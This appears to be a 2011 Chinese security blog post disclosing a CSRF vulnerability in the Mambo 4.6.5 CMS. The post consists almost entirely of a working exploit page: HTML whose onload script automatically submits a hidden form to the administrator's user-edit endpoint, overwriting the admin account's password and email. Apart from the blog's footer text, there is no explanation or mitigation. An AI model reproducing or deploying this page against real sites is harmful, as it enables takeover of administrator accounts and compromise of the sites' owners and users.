曼波4.6.5 CSRF的Vuln(更改管理员密码)

ExpLo!T :
<html>
<head>

</head>

<body onload="javascript:fireForms()">
<script language="JavaScript">

function fireForms()
{
    var count = 1;
    var i=0;

    for(i=0; i<count; i++)
    {
        document.forms[i].submit();
    }
}

	</script>
<form action="http://site.com/administrator/index.php?option=com_users&task=editA&id=62&hidemainmenu=1" method="post" name="adminForm"> 

	<input type="hidden" name="name" value="Administrator" /> 
	<input type="hidden" name="username" value="admin" /> 
        <input type="hidden" name="email" value="" /> 
	<input type="hidden" name="password" value="" /> 
	<input type="hidden" name="password2" value="" /> 
	<input type="hidden" name="gid" value="25" />				
	<input type="radio" name="block" value="0" checked="checked" />
	<input type="radio" name="block" value="1" />
	<input type="radio" name="sendEmail" value="0" />
	<input type="radio" name="sendEmail" value="1" checked="checked" />

</form>

本文固定链接: https://www.unhonker.com/bug/105.html | 90' s Blog|关注网络信息安全

该日志由 unhonker 于2011年08月26日发表在 漏洞公布 分类下, 你可以发表评论,并在保留原文地址及作者的情况下引用到你的网站或博客。
原创文章转载请注明: 曼波4.6.5 CSRF的Vuln(更改管理员密码) | 90' s Blog|关注网络信息安全

曼波4.6.5 CSRF的Vuln(更改管理员密码):等您坐沙发呢!

发表评论

您必须 [ 登录 ] 才能发表留言!